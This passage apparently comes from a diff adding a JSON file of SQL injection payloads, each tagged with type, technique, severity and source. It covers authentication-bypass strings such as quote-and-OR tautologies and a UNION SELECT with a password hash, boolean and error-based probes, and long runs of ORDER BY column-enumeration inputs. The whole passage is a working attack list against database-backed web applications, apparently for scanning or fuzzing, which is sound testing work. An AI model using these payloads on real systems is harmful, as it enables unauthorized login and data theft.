"sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin') or '1'='1'/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\" --", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\" #", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\"/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\" or \"1\"=\"1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\" or \"1\"=\"1\"--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\" or \"1\"=\"1\"#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\" or \"1\"=\"1\"/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\"or 1=1 or \"\"=\"", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\" or 1=1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\" or 1=1--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\" or 1=1#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\" or 1=1/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\") or (\"1\"=\"1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\") or (\"1\"=\"1\"--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\") or (\"1\"=\"1\"#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\") or (\"1\"=\"1\"/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\") or \"1\"=\"1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\") or \"1\"=\"1\"--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\") or \"1\"=\"1\"#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin\") or \"1\"=\"1\"/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "1' or 1.e(1) or '1'='1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "OR 1=0", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "OR x=x", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "OR x=y", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "OR 1=1#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "OR 1=0#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "OR x=x#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "OR x=y#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "OR 1=1--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "OR 1=0--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "OR x=x--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "OR x=y--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "OR 3409=3409 AND ('pytW' LIKE 'pytW", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "OR 3409=3409 AND ('pytW' LIKE 'pytY", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "HAVING 1=1", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "HAVING 1=0", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "HAVING 1=1#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "HAVING 1=0#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "HAVING 1=1--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "HAVING 1=0--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AND 1=1", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AND 1=0", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AND 1=1--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AND 1=0--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AND 1=1#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AND 1=0#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AND 1=1 AND '%'='", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AND 1=0 AND '%'='", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AND 1083=1083 AND (1427=1427", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AND 7506=9091 AND (5913=5913", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AND 1083=1083 AND ('1427=1427", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AND 7506=9091 AND ('5913=5913", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AND 7300=7300 AND 'pKlZ'='pKlZ", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AND 7300=7300 AND 'pKlZ'='pKlY", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AND 7300=7300 AND ('pKlZ'='pKlZ", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AND 7300=7300 AND ('pKlZ'='pKlY", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AS INJECTX WHERE 1=1 AND 1=1", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AS INJECTX WHERE 1=1 AND 1=0", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AS INJECTX WHERE 1=1 AND 1=1#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AS INJECTX WHERE 1=1 AND 1=0#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AS INJECTX WHERE 1=1 AND 1=1--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "AS INJECTX WHERE 1=1 AND 1=0--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "WHERE 1=1 AND 1=1", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "WHERE 1=1 AND 1=0", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "WHERE 1=1 AND 1=1#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "WHERE 1=1 AND 1=0#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "WHERE 1=1 AND 1=1--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "WHERE 1=1 AND 1=0--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 1--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 2--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 3--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 4--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 5--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 6--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 7--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 8--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 9--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 10--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 11--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 12--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 13--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 14--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 15--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 16--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 17--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 18--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 19--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 20--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 21--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 22--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 23--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 24--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 25--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 26--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 27--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 28--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 29--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 30--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 31337--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 1#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 2#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 3#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 4#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 5#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 6#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 7#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 8#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 9#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 10#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 11#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 12#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 13#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 14#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 15#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 16#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 17#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 18#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 19#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 20#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 21#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 22#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 23#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 24#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 25#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 26#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 27#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 28#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 29#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 30#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 31337#", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 1", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 2", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 3", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 4", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 5", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 6", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 7", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 8", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 9", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 10", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 11", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 12", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 13", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 14", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 15", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 16", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 17", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 18", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 19", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 20", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 21", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 22", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 23", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Generic_ErrorBased" + } + }, + { + "payload": "ORDER BY 24", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": 